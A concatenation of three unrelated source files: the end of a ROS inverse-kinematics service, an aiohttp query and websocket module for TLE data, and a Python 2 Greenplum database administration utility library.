theta1 = atan2(WC[1], WC[0])
theta2 = pi/2 - angle_a - atan2(side_bz, side_bxy)
theta3 = pi/2 - (angle_b + 0.036) # 0.036 sag in link4
R0_3 = T0_1[0:3,0:3] * T1_2[0:3,0:3] * T2_3[0:3,0:3]
R0_3 = R0_3.evalf(subs={q1: theta1, q2:theta2, q3: theta3})
R3_6 = R0_3.transpose() * ROT_EE
theta4 = atan2(R3_6[2,2], -R3_6[0,2])
theta5 = atan2(sqrt(pow(R3_6[0,2], 2) + pow(R3_6[2,2], 2)), R3_6[1,2])
theta6 = atan2(-R3_6[1,1], R3_6[1,0])
joint_trajectory_point.positions = [theta1, theta2, theta3, theta4, theta5, theta6]
joint_trajectory_list.append(joint_trajectory_point)
rospy.loginfo("length of Joint Trajectory List: %s" % len(joint_trajectory_list))
return CalculateIKResponse(joint_trajectory_list)
def IK_server():
# initialize node and declare calculate_ik service
rospy.init_node('IK_server')
s = rospy.Service('calculate_ik', CalculateIK, handle_calculate_IK)
print "Ready to receive an IK request"
rospy.spin()
if __name__ == "__main__":
IK_server()
|
StarcoderdataPython
|
11308242
|
<gh_stars>0
# -*- coding: utf-8 -*-
import sqlalchemy as sa
import ujson
from aiohttp import web, WSMsgType
from .db import TLE
from .log import logger
from .utils import parse_sa_filter, parse_sa_order, check_sa_column, get_sa_column
async def query(request):
filters = []
if 'filters' not in request.query:
raise web.HTTPBadRequest(reason='Query parameter `filters` is required')
try:
_filters = ujson.loads(request.query.get('filters', '{}'))
for k, v in _filters.items():
filters.extend(parse_sa_filter(TLE, k, v))
except ValueError:
raise web.HTTPBadRequest(reason='Query parameter `filters` must contains valid JSON')
_order = request.query.get('order', '{}')
if _order.startswith('{'):
try:
order = ujson.loads(_order)
except ValueError:
raise web.HTTPBadRequest(reason='Query parameter `order` must contains valid JSON')
else:
order = _order
order = parse_sa_order(TLE, order)
only = [get_sa_column(TLE, key) for key in request.query.get('only', '').split(',') if check_sa_column(TLE, key)]
async with request.app['pg'].acquire() as conn:
rp = await conn.execute(sa.select(only or [TLE]).where(sa.and_(*filters)).order_by(*order))
return [dict(r) async for r in rp]
async def index(request):
html = '''
<html>
<head>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script>
var source = new WebSocket('ws://' + window.location.host + '/subscribe');
function eventListener(event) {
var message = JSON.parse(event.data);
$('.messages').append([
$('<dt>').text(message.channel),
$('<dd>').text(event.data),
]);
}
source.onmessage = eventListener;
</script>
</head>
<body>
<dl class="messages"></dl>
</body>
</html>
'''
return web.Response(text=html, content_type='text/html')
async def subscribe(request):
ws = web.WebSocketResponse()
await ws.prepare(request)
request.app['channels'].add(ws)
logger.debug('Someone joined.')
try:
while True:
msg = await ws.receive_json()
if msg.get('command') == 'close':
await ws.close()
except Exception as exc:
logger.exception(exc)
finally:
request.app['channels'].remove(ws)
if ws.closed:
request.app['channels'].remove(ws)
logger.debug('websocket connection closed')
return ws
|
StarcoderdataPython
|
6637132
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import with_statement
import os, sys
progname = os.path.split(sys.argv[0])[-1]
if sys.version_info < (2, 5, 0):
sys.exit(
'''Error: %s is supported on Python versions 2.5.0 or greater
Please upgrade python installed on this machine.''' % progname)
#turning off Deprecation warnings (for now)
import warnings
warnings.simplefilter('ignore', DeprecationWarning)
import platform, gplib, socket, random, popen2
import threading
from time import localtime, strftime
import pg8000
import pysync
##################
log = {}
log['verbose'] = True
log['module'] = ''
log['host'] = socket.gethostname().split('.')[0]
log['user'] = os.environ.get('USER') or os.environ.get('LOGNAME')
log['file'] = None
##################
def log_set_module(module):
global log
log['module'] = module
##################
def log_set_verbose(verbose):
global log
log['verbose'] = verbose
##################
def log_set_file(file):
global log
log['file'] = file
##################
def log_info(msg, tofile=False):
global log
logs = '%s:%s:%s:%s-[INFO]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['verbose'] and not tofile:
print logs
else:
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
##################
def log_error(msg, tofile=False):
global log
logs = '%s:%s:%s:%s-[ERROR]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['verbose'] and not tofile:
print logs
else:
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
##################
def log_warn(msg, tofile=False):
global log
logs = '%s:%s:%s:%s-[WARN]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['verbose'] and not tofile:
print logs
else:
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
##################
def log_fatal(msg, tofile=False):
global log
logs = '%s:%s:%s:%s-[FATAL]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['verbose'] and not tofile:
print logs
else:
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
##################
def error(msg):
global log
logs = '%s:%s:%s:%s-[ERROR]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
print logs
print '%s:%s:%s:%s-[ERROR]:- Program aborted.' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'])
sys.exit(1)
##################
def fatal(msg):
global log
logs = '%s:%s:%s:%s-[FATAL]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
print logs
print '%s:%s:%s:%s-[FATAL]:- Program aborted.' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'])
sys.exit(2)
#############
def findCmdInPath_noerror(cmd):
CMDPATH = ('/usr/kerberos/bin', '/usr/sfw/bin', '/opt/sfw/bin', '/usr/local/bin', '/bin',
'/usr/bin', '/sbin', '/usr/sbin', '/usr/ucb', '/sw/bin', '/opt/Navisphere/bin')
for p in CMDPATH:
f = os.path.join(p, cmd)
if os.path.exists(f):
return f
return ''
def findCmdInPath(cmd):
cmd = findCmdInPath_noerror(cmd)
if cmd == '':
fatal('Command %s not found' % cmd)
return cmd
#############
def makeCommand(cmd):
GPHOME=os.environ.get('GPHOME')
LIB_PATH=os.environ.get(ENV.LIB_TYPE)
if not LIB_PATH:
LIB_PATH='%s/lib:%s/ext/python/lib:.' % (GPHOME, GPHOME)
PATH=os.environ.get('PATH')
if not PATH:
PATH='%s/bin:%s/ext/python/bin:.' % (GPHOME, GPHOME)
PYTHONPATH=os.environ.get('PYTHONPATH')
if not PYTHONPATH:
PYTHONPATH="%(gphome)s/lib/python" % {'gphome':GPHOME}
return ('GPHOME=%s && export GPHOME '
'&& PATH=%s && export PATH '
'&& %s=%s && export %s '
'&& PYTHONPATH=%s && export PYTHONPATH '
'&& %s'
% (GPHOME,
PATH,
ENV.LIB_TYPE,
LIB_PATH,
ENV.LIB_TYPE,
PYTHONPATH,
cmd))
#############
def run2(cmd, on_error_warn=False, setpid_callback=None):
p = None
ok = False
out = []
try:
p = popen2.Popen3(cmd, capturestderr=True)
if setpid_callback:
setpid_callback(p.pid)
e = p.wait()
for line in p.fromchild:
out.append(line)
ok = not e
if not ok and on_error_warn:
log_warn('-----------------------------------------------------')
log_warn('Command Failed: %s' % cmd)
log_warn('Exit status: %d' % os.WEXITSTATUS(e))
if len(out) > 0:
log_warn('Standard output:')
for l in out:
log_warn('\t %s' % l.strip())
else:
log_warn('Standard output: None')
err = []
for line in p.childerr:
err.append(line)
if len(err) > 0:
log_warn('Standard error:')
for l in err:
log_warn('\t %s' % l.strip())
else:
log_warn('Standard error: None')
log_warn('-----------------------------------------------------')
finally:
if p:
if p.fromchild:
p.fromchild.close()
if p.childerr:
p.childerr.close()
return (ok, out)
def run(cmd):
return run2(cmd, False)
def run_warn(cmd, setpid_callback=None):
return run2(cmd, on_error_warn=True,setpid_callback=setpid_callback)
#############
def file_exists(file, host=None):
if not host or host == 'localhost':
return os.path.isfile(file)
else:
(ok, out) = run('%s test -f %s && test -r %s' % (gplib.ssh_prefix(host=host), file, file))
return ok
#############
def directory_exists(dir, host=None):
if not host or host == 'localhost':
return os.path.isdir(dir)
else:
(ok, out) = run('%s test -d %s' % (gplib.ssh_prefix(host=host), dir))
return ok
#############
def directory_writable(dir, host=None):
f = None
file = os.path.join(dir, 'tmp_file_test')
if not host or host == 'localhost':
try:
try:
f = open(file, 'w')
f.close()
except IOError, e:
fatal('write file %s error' % file)
finally:
f.close()
os.remove(file)
else:
gphome = os.environ.get('GPHOME')
cmd = makeCommand('''python -c \\"import sys, os; sys.path.extend(['%s', '%s']); import gpmlib; gpmlib.directory_writable('%s')\\"''' %
(os.path.join(gphome, 'bin', 'lib'), os.path.join(gphome, 'lib', 'python'), dir))
(ok, out) = run('''%s "%s"''' % (gplib.ssh_prefix(host=host), cmd))
if not ok:
fatal('write file %s error' % file)
return True
#############
class Env:
def __init__(self):
self.GPHOME = None
self.USER = None
# mirror type
self.MIRROR_NULL_TYPE = 0
self.MIRROR_SINGLE_HOME_GROUP_TYPE = 1
self.MIRROR_SINGLE_HOME_SPREAD_TYPE = 2
self.MIRROR_MULTI_HOME_GROUP_TYPE = 3
self.MIRROR_MULTI_HOME_SPREAD_TYPE = 4
self.DBNAME = 'template1'
self.GP_PG_VIEW = '''(SELECT l.dbid, l.isprimary, l.content, l."valid",
l.definedprimary FROM gp_pgdatabase() l(dbid smallint,
isprimary boolean, content smallint, "valid" boolean,
definedprimary boolean))'''
self.AWK = findCmdInPath('awk')
self.BASENAME = findCmdInPath('basename')
self.CAT = findCmdInPath('cat')
self.CLEAR = findCmdInPath('clear')
self.CKSUM = findCmdInPath('cksum')
self.CUT = findCmdInPath('cut')
self.DATE = findCmdInPath('date')
self.DD = findCmdInPath('dd')
self.DIRNAME = findCmdInPath('dirname')
self.DF = findCmdInPath('df')
self.DU = findCmdInPath('du')
self.ECHO = findCmdInPath('echo')
self.EXPR = findCmdInPath('expr')
self.FIND = findCmdInPath('find')
self.GP_MOUNT_AGENT = findCmdInPath_noerror('gp_mount_agent') # GPDB supplied, but only required for SAN.
self.GREP = findCmdInPath('grep')
self.GZIP = findCmdInPath('gzip')
self.EGREP = findCmdInPath('egrep')
self.HEAD = findCmdInPath('head')
self.HOSTNAME = findCmdInPath('hostname')
self.INQ = findCmdInPath_noerror('inq') # SAN-specific not available on every system.
self.IPCS = findCmdInPath('ipcs')
self.IFCONFIG = findCmdInPath('ifconfig')
self.KILL = findCmdInPath('kill')
self.LS = findCmdInPath('ls')
self.LOCALE = findCmdInPath('locale')
self.MV = findCmdInPath('mv')
self.MORE = findCmdInPath('more')
self.MOUNT = findCmdInPath('mount')
self.MKDIR = findCmdInPath('mkdir')
self.MKFIFO = findCmdInPath('mkfifo')
self.NAVISECCLI = findCmdInPath_noerror('naviseccli') # SAN-specific not available on every system.
self.NETSTAT = findCmdInPath('netstat')
self.PING = findCmdInPath('ping')
self.POWERMT = findCmdInPath_noerror('powermt') # SAN-specific not available on every system.
self.PS = findCmdInPath('ps')
self.RM = findCmdInPath('rm')
self.SCP = findCmdInPath('scp')
self.SED = findCmdInPath('sed')
self.SLEEP = findCmdInPath('sleep')
self.SORT = findCmdInPath('sort')
self.SPLIT = findCmdInPath('split')
self.SSH = findCmdInPath('ssh')
self.STAT = findCmdInPath_noerror('stat') # Only required for SAN.
self.TAIL = findCmdInPath('tail')
self.TAR = findCmdInPath('tar')
self.TEE = findCmdInPath('tee')
self.TOUCH = findCmdInPath('touch')
self.TR = findCmdInPath('tr')
self.WC = findCmdInPath('wc')
self.WHICH = findCmdInPath('which')
self.WHOAMI = findCmdInPath('whoami')
self.ZCAT = findCmdInPath('zcat')
plat = platform.uname()
self.SYSTEM = plat[0].lower()
if self.SYSTEM == 'sunos':
self.IFCONFIG_TXT='-a inet'
self.PS_TXT='ef'
self.LIB_TYPE='LD_LIBRARY_PATH'
self.ZCAT='gzcat'
self.PG_METHOD='trust'
self.HOST_ARCH_TYPE='uname -i'
self.NOLINE_ECHO='/usr/bin/echo'
self.DEFAULT_LOCALE_SETTING='en_US.UTF-8'
self.MAIL='/bin/mailx'
self.PING_TIME='1'
self.DF=findCmdInPath('df')
self.DU_TXT='-s'
self.GTAR = findCmdInPath('gtar')
elif self.SYSTEM == 'linux':
self.IFCONFIG_TXT=''
self.PS_TXT='ax'
self.LIB_TYPE='LD_LIBRARY_PATH'
self.PG_METHOD='ident'
self.HOST_ARCH_TYPE='uname -i'
self.NOLINE_ECHO='%s -e' % self.ECHO
self.DEFAULT_LOCALE_SETTING='en_US.utf8'
self.PING_TIME='-c 1'
self.DF='%s -P' % findCmdInPath('df')
self.DU_TXT='c'
self.GTAR = findCmdInPath('tar')
elif self.SYSTEM == 'darwin':
self.IFCONFIG_TXT=''
self.PS_TXT='ax'
self.LIB_TYPE='DYLD_LIBRARY_PATH'
self.PG_METHOD='ident'
self.HOST_ARCH_TYPE='uname -m'
self.NOLINE_ECHO= self.ECHO
self.DEFAULT_LOCALE_SETTING='en_US.utf-8'
self.PING_TIME='-c 1'
self.DF='%s -P' % findCmdInPath('df')
self.DU_TXT='-c'
self.GTAR = findCmdInPath('tar')
elif self.SYSTEM == 'freebsd':
self.IFCONFIG_TXT=''
self.PS_TXT='ax'
self.LIB_TYPE='LD_LIBRARY_PATH'
self.PG_METHOD='ident'
self.HOST_ARCH_TYPE='uname -m'
self.NOLINE_ECHO='%s -e' % self.ECHO
self.DEFAULT_LOCALE_SETTING='en_US.utf-8'
self.PING_TIME='-c 1'
self.DF='%s -P' % findCmdInPath('df')
self.DU_TXT='-c'
self.GTAR = findCmdInPath('tar')
else:
fatal('platform not supported')
def chk_environ(self):
self.GPHOME=os.getenv('GPHOME')
if not self.GPHOME:
fatal('GPHOME not found')
self.USER =os.getenv('USER') or os.getenv('LOGNAME')
if not self.USER:
fatal('USER not found')
LIB_PATH=os.getenv(self.LIB_TYPE)
if not LIB_PATH:
LIB_PATH='.'
PATH=os.getenv('PATH')
if not PATH:
PATH='.'
os.environ[self.LIB_TYPE]='%s/lib:%s/ext/python/lib:%s' % (self.GPHOME, self.GPHOME, LIB_PATH)
os.environ['PATH']='%s/bin:%s/ext/python/bin:%s' % (self.GPHOME, self.GPHOME, PATH)
ENV = Env()
#############
def ping_host(host, fail_exit=False):
if ENV.SYSTEM == 'darwin':
(ok, out) = run('%s %s %s > /dev/null 2>&1' % (ENV.PING, ENV.PING_TIME, host))
else:
(ok, out) = run('%s %s %s > /dev/null 2>&1' % (ENV.PING, host, ENV.PING_TIME))
if ok:
log_info('%s contact established' % host)
else:
if fail_exit:
fatal('Unable to contact %s' % host)
else:
log_warn('Unable to contact %s' % host)
return ok
def chk_postgres_version(host):
cmd = makeCommand('%s --gp-version' % os.path.join(os.environ.get('GPHOME'), 'bin/postgres'))
(ok, out) = run(cmd)
if not ok:
log_error('Unable to get Greenplum database version')
return False
current = out[0].strip()
(ok, out) = run('ssh %s "%s"' % (host, cmd))
if not ok:
log_error('Unable to get Greenplum database version on remote host %s' % host)
return False
remote = out[0].strip()
if current != remote:
log_error('Greenplum database version does not match. %s != %s' % (current, remote))
return False
return True
#############
def postgres_active(port, host=None):
ret = 0
pg_lock_file = '/tmp/.s.PGSQL.%d.lock' % port
pg_lock_netstat = 0
pid = 0
# ping host if present
if host:
ok = ping_host(host)
if not ok:
return (ok, pid)
# netstat to check the port number
(ok, out) = run('%s %s -an 2> /dev/null | %s ".s.PGSQL.%d" | %s \'{print $NF}\'| %s -F"." \'{print $NF}\' | %s -u' %
(host and gplib.ssh_prefix(host=host) or '', ENV.NETSTAT, ENV.GREP, port, ENV.AWK, ENV.AWK, ENV.SORT))
if not ok:
return (ok, pid)
for p_chk in out:
p = int(p_chk)
if p == port:
pg_lock_netstat = port
pg_lock_tmp = False
if file_exists(file=pg_lock_file, host=host):
pg_lock_tmp = True
if pg_lock_netstat == 0 and pg_lock_tmp == False:
ret = 1
pid = 0
log_info('No socket connection or lock file in /tmp found for %s port=%d' % (host and host or '', port))
else:
if not pg_lock_tmp and pg_lock_netstat != 0:
log_warn('No lock file %s but process running on %s port %d' % (pg_lock_file, host and host or '', port))
ret = 1
if pg_lock_tmp and pg_lock_netstat == 0:
if file_exists(file=pg_lock_file, host=host):
(ok, out) = run('%s %s %s | %s -1 | %s \'{print $1}\'' % (host and gplib.ssh_prefix(host=host) or '', ENV.CAT, pg_lock_file, ENV.HEAD, ENV.AWK))
if not ok:
return (ok, pid)
pid = int(out[0])
else:
log_warn('Unable to access %s' % pg_lock_file)
log_warn('Have lock file %s but no process running on %s port %d' % (pg_lock_file, host and host or '', port))
ret = 1
if pg_lock_tmp and pg_lock_netstat != 0:
if file_exists(file=pg_lock_file, host=host):
(ok, out) = run('%s %s %s | %s -1 | %s \'{print $1}\'' % (host and gplib.ssh_prefix(host=host) or '', ENV.CAT, pg_lock_file, ENV.HEAD, ENV.AWK))
if not ok:
return (ok, pid)
pid = int(out[0])
else:
log_warn('Unable to access %s' % pg_lock_file)
ret = 1
#log_info('Have lock file %s and a process running on %s port %d' % (pg_lock_file, host and host or '', port))
return (not ret, pid)
#############
def get_master_port(master_data_dir):
master_port = 0
if not os.path.exists(master_data_dir):
fatal('No %s directory' % master_data_dir)
if os.path.exists(os.path.join(master_data_dir, 'postgresql.conf')):
(ok, out) = run('%s \'split($0,a,"#")>0 && split(a[1],b,"=")>1 {print b[1] " " b[2]}\' %s/postgresql.conf | %s \'$1=="port" {print $2}\' | %s -1' % (ENV.AWK, master_data_dir, ENV.AWK, ENV.TAIL))
if not ok or out[0].strip() == '':
fatal('Failed to obtain master port number from %s/postgresql.conf' % master_data_dir)
master_port = int(out[0])
else:
fatal('Do not have access to %s/postgresql.conf' % master_data_dir)
return master_port
#############
def chk_db_running(db, chk_dispatch_access):
master_data_directory = os.getenv('MASTER_DATA_DIRECTORY')
if not directory_exists(master_data_directory):
fatal('No Master %s directory' % master_data_directory)
if not file_exists('%s/postgresql.conf' % master_data_directory):
fatal('No %s/postgresql.conf file' % master_data_directory)
port = get_master_port(master_data_directory)
try:
db.execute('''select d.datname as "Name", r.rolname as "Owner",
pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding"
FROM pg_catalog.pg_database d JOIN pg_catalog.pg_authid r ON d.datdba = r.oid ORDER BY 1''')
if chk_dispatch_access:
pass
except pg8000.errors.InterfaceError, e:
return False
return True
#############
def unique(alist):
set = {}
map(set.__setitem__, alist, [])
return set.keys()
#############
def chk_multi_home(hostlist, full=True):
hosts = full and hostlist or hostlist[0:2]
hostnames=[]
for host in hosts:
(ok, out) = run('%s %s' % (gplib.ssh_prefix(host=host), ENV.HOSTNAME))
if not ok:
error('failed to run hostname on remote host')
hostnames.append(out[0].strip())
hostnames_uniq = unique(hostnames)
return len(hostnames_uniq) != len(hostnames)
#############
def get_qe_details(db, order_by = "dbid"):
db.execute('''
select a.hostname, fse.fselocation as datadir, a.port, b.valid,
b.definedprimary, a.dbid, a.content
from gp_segment_configuration a, gp_pgdatabase b, pg_filespace_entry fse
where a.dbid=b.dbid and fsedbid=a.dbid
and fsefsoid = (select oid from pg_filespace where fsname='pg_system')
and a.content <> -1 order by a.%s''' % order_by)
rows = [ r for r in db.iterate_dict() ]
return rows
#############
def chk_mirrors_configured(db):
db.execute('select count(dbid)/count(distinct(content)) from gp_segment_configuration where content<>-1')
r = db.read_tuple()
return r[0] == 2
#############
def get_mirror_type(db, multi_home):
if not chk_mirrors_configured(db):
mir_type = 'No Mirror'
mir_type_num = ENV.MIRROR_NULL_TYPE
else:
db.execute("select count(distinct hostname)/(select count(distinct hostname) from gp_segment_configuration where preferred_role='p' and content<>-1) from gp_segment_configuration where content<>-1")
r = db.read_tuple()
sep_count = r[0]
if sep_count == 2:
sep_text = '[Separate array]'
else:
sep_text = '[Shared array]'
# get number of primary hosts
db.execute("select count(distinct(hostname)) from gp_segment_configuration where content<>-1")
r = db.read_tuple()
num_seg_hosts = r[0]
# get the primary and mirror hostnames for the first segment instance host
db.execute("select hostname, content, preferred_role='p' as definedprimary from gp_segment_configuration where content>-1 and content<(select max(port)-min(port)+1 from gp_segment_configuration where content<>-1 and preferred_role='p') order by content,dbid")
first_pri_mir_array = [ x for x in db.iterate_dict() ]
first_pri_array = filter(lambda (x): x['definedprimary'] == True, first_pri_mir_array)
first_mir_array = filter(lambda (x): x['definedprimary'] == False, first_pri_mir_array)
seg_per_host = len(first_pri_mir_array) / 2
if not multi_home:
hosts = [ x['hostname'] for x in first_pri_mir_array ]
if len(unique(hosts)) == 2 or num_seg_hosts == 1:
mir_type = 'Group [Single-home] %s' % sep_text
mir_type_num = ENV.MIRROR_SINGLE_HOME_GROUP_TYPE
else:
mir_type = 'Spread [Single-home] %s' % sep_text
mir_type_num = ENV.MIRROR_SINGLE_HOME_SPREAD_TYPE
else:
mir_array = []
for i in range(seg_per_host):
pri_host = first_pri_array[i]['hostname']
db.execute("select hostname from gp_segment_configuration where preferred_role = 'm' and content = %d" % (i))
r = db.read_tuple()
mir_host = r[0]
(ok, out) = run('%s "hostname"' % (gplib.ssh_prefix(host=mir_host)))
if not ok:
error('hostname on %s failed' % mir_host)
mir_array.append(out[0])
uniq_cnt = len(unique(mir_array))
if uniq_cnt == 1:
mir_type = 'Group [Multi-home] %s' % sep_text
mir_type_num = ENV.MIRROR_MULTI_HOME_GROUP_TYPE
else:
mir_type = 'Spread [Mutli-home] %s' % sep_text
mir_type_num = ENV.MIRROR_MULTI_HOME_SPREAD_TYPE
return (mir_type_num, mir_type)
#############
def get_ipaddr(host):
(ok, out) = run('%s "%s %s | %s \\"inet\\"| %s -v \\"127.0.0\\"| %s -v \\"inet6\\""' %
(gplib.ssh_prefix(host=host), ENV.IFCONFIG,
ENV.IFCONFIG_TXT, ENV.GREP, ENV.GREP, ENV.GREP))
if not ok:
return None
addr = []
for l in out:
x = l.strip().split()
ip = x[1].split(':')
addr.append(len(ip) == 2 and ip[1] or ip[0])
return addr
#############
def get_ipaddr_to_stdout(host):
addr = get_ipaddr(host)
if addr:
for a in addr:
sys.stdout.write(a)
sys.stdout.write(' ')
sys.stdout.write('\n')
else:
sys.exit(1)
#############
def edit_file(host, file, search_txt, sub_txt, append=False):
if host != 'localhost':
gphome = os.environ.get('GPHOME')
cmd = makeCommand('''python -c \\"import sys; sys.path.extend(['%s', '%s']); import gpmlib; gpmlib.edit_file('localhost', '%s', '%s', '%s', %s)\\"''' %
(os.path.join(gphome, 'bin', 'lib'),
os.path.join(gphome, 'lib', 'python'),
file,
search_txt,
sub_txt,
str(append)))
(ok, out) = run2('''%s "%s"''' % (gplib.ssh_prefix(host=host), cmd), True)
return ok
else:
f = None
tmpf = None
tmpfile = '%s.tmp' % file
try:
try:
f = open(file, 'r')
tmpf = open(tmpfile, 'w')
for line in f:
if line.find(search_txt) != -1:
tmpf.write(sub_txt)
if append:
tmpf.write(' # ')
tmpf.write(line)
else:
tmpf.write('\n')
else:
tmpf.write(line)
except IOError, e:
log_error(str(e))
return False
finally:
if f: f.close()
if tmpf: tmpf.close()
try:
os.rename(tmpfile, file)
except OSError, e:
log_error('rename file from %s to %s failed' % (tmpfile, file))
return False
return True
class _SyncProgress:
markLock = threading.Lock()
def __init__(self, logfunc, dst_cfg):
self.logfunc = logfunc
self.dst_host = dst_cfg["hostname"]
self.dst_dir = dst_cfg["datadir"]
self.dbid = dst_cfg["dbid"] if dst_cfg.has_key("dbid") else None
self.content = dst_cfg["content"] if dst_cfg.has_key("content") else None
self._tag = "%s:dbid=%s" % (self.dst_host, self.dbid) if self.dbid != None else "%s:%s" % (self.dst_host, self.dst_dir)
def mark_sync_progress(self, message):
with _SyncProgress.markLock:
self.logfunc("%s %s" % (self._tag, message))
#############
def sync_segment_datadir(src_host, src_dir, dst_cfg, logfile,
force_stop=True, setpid_callback=None, err_is_fatal=True,
verbose=False, progressBytes=None, progressTime=None):
if setpid_callback:
log_warn('Use of sync_segment_datadir setpid_callback keyword is deprecated')
if directory_exists(dst_cfg['datadir'], dst_cfg['hostname']):
log_info('Data Directory %s exists' % dst_cfg['datadir'])
else:
# make mirror data directory
log_info('Make directory %s' % dst_cfg['datadir'])
(ok, out) = run('%s "%s %s && chmod 700 %s"' %
(gplib.ssh_prefix(host=dst_cfg['hostname']),
ENV.MKDIR,
dst_cfg['datadir'],
dst_cfg['datadir']))
if not ok:
fatal('mkdir directory %s host %s failed' % (dst_cfg['datadir'], dst_cfg['hostname']))
# Call PysyncProxy to initiate the sync operation with progress feedback
pysyncOptions = ["--delete", "-x", "db_dumps", "-x", "pg_log"]
sync = pysync.PysyncProxy(src_host, src_dir, dst_cfg['hostname'], dst_cfg['datadir'],
pysyncOptions, verbose=verbose,
progressBytes=progressBytes, progressTime=progressTime,
recordProgressCallback=_SyncProgress(log_info, dst_cfg).mark_sync_progress)
code = sync.run()
ok = (code == 0)
if not ok:
log_warn('-----------------------------------------------------')
log_warn('Command Failed: %s' % sync.cmd)
log_warn('Return code: %d' % code)
log_warn('Exit status: %d' % os.WEXITSTATUS(sync.returncode))
if sync.stdout:
log_warn('Standard output:')
for l in sync.stdout:
log_warn('\t %s' % l.strip())
else:
log_warn('Standard output: None')
if sync.stderr:
log_warn('Standard error:')
for l in sync.stderr:
log_warn('\t %s' % l.strip())
else:
log_warn('Standard error: None')
log_warn('-----------------------------------------------------')
if err_is_fatal:
fatal('failed to synchronize data from primary segment %s:%s to mirror segment %s:%s' % (src_host, src_dir,
dst_cfg['hostname'], dst_cfg['datadir']))
else:
log_error('failed to synchronize data from primary segment %s:%s to mirror segment %s:%s' % (src_host, src_dir,
dst_cfg['hostname'], dst_cfg['datadir']))
return False
# delete postmaster.pid in case active segment is still running
postmaster_pid = os.path.join(dst_cfg['datadir'], 'postmaster.pid')
(ok, out) = run('%s "if [ -f %s ] ; then rm -rf %s; fi"' %
(gplib.ssh_prefix(host=dst_cfg['hostname']),
postmaster_pid,
postmaster_pid))
# delete postmaster.opts in case active segment is still running
postmaster_opts = os.path.join(dst_cfg['datadir'], 'postmaster.opts')
(ok, out) = run('%s "if [ -f %s ] ; then rm -rf %s; fi"' %
(gplib.ssh_prefix(host=dst_cfg['hostname']),
postmaster_opts,
postmaster_opts))
# change port number in postgresql.conf
sub_txt = 'port=%d' % dst_cfg['port']
ok = edit_file(dst_cfg['hostname'], os.path.join(dst_cfg['datadir'], 'postgresql.conf'),
'port=', sub_txt, True)
if not ok:
fatal('failed to edit postgresql.conf')
# start mirror segment in admin mode
log_info('create pg_log directory')
cmd = makeCommand('mkdir %s/pg_log' % dst_cfg['datadir'])
(ok, out) = run_warn('%s "%s"' % (gplib.ssh_prefix(host=dst_cfg['hostname']),cmd))
log_info('sync segment datadir=%s port=%d on host %s succeeded' % (dst_cfg['datadir'], dst_cfg['port'], dst_cfg['hostname']))
return True
log_info('start segment datadir=%s port=%d on %s' % (dst_cfg['datadir'], dst_cfg['port'], dst_cfg['hostname']))
cmd = makeCommand('env PGOPTIONS=\\"-c gp_session_role=utility\\" %s -w -D %s -l %s/pg_log/startup.log -o \\"-i -p %d \\" start 2>&1' %
(os.path.join(ENV.GPHOME, 'bin/pg_ctl'),
dst_cfg['datadir'], dst_cfg['datadir'], dst_cfg['port']))
(ok, out) = run_warn('%s "%s"' %
(gplib.ssh_prefix(host=dst_cfg['hostname']),
cmd))
if not ok:
fatal('failed to start mirror segment %s:%s in admin mode' % (dst_cfg['hostname'], dst_cfg['datadir']))
if force_stop:
# stop mirror segment
log_info('stop segment datadir=%s port=%d on %s' % (dst_cfg['datadir'], dst_cfg['port'], dst_cfg['hostname']))
cmd = makeCommand('env PGOPTIONS=\\"-c gp_session_role=utility\\" %s -w stop -D %s -m smart -l %s.log' %
(os.path.join(ENV.GPHOME, 'bin/pg_ctl'),
dst_cfg['datadir'], dst_cfg['datadir']))
(ok, out) = run_warn('%s "%s" >> %s 2>&1' %
(gplib.ssh_prefix(host=dst_cfg['hostname']),
cmd,
logfile))
if not ok:
fatal('failed to stop mirror segment %s:%s' % (dst_cfg['hostname'], dst_cfg['datadir']))
log_info('sync segment datadir=%s port=%d on host %s succeeded' % (dst_cfg['datadir'], dst_cfg['port'], dst_cfg['hostname']))
return True
#############
def append_pg_hba(host, datadir, new_addr):
pg_hba = os.path.join(datadir, 'pg_hba.conf')
for addr in new_addr:
(ok, out) = run_warn('%s "echo host all all %s/32 trust >> %s"' %
(gplib.ssh_prefix(host=host),
addr, pg_hba))
if not ok:
fatal('update %s:%s failed' % (host, pg_hba))
return True
#############
def get_gp_prefix(datadir):
base = os.path.basename(datadir)
idx = base.rfind('-1')
if idx == -1:
return None
return base[0:idx]
##################
def chk_on_passive_standby(master_port):
gpsync_count = 0
(ok, pid) = postgres_active(master_port)
postmaster_opts = os.path.join(os.environ.get('MASTER_DATA_DIRECTORY'), 'postmaster.opts')
if os.path.isfile(postmaster_opts):
(okok, out) = run('%s -c gpsync %s' % (ENV.GREP, postmaster_opts))
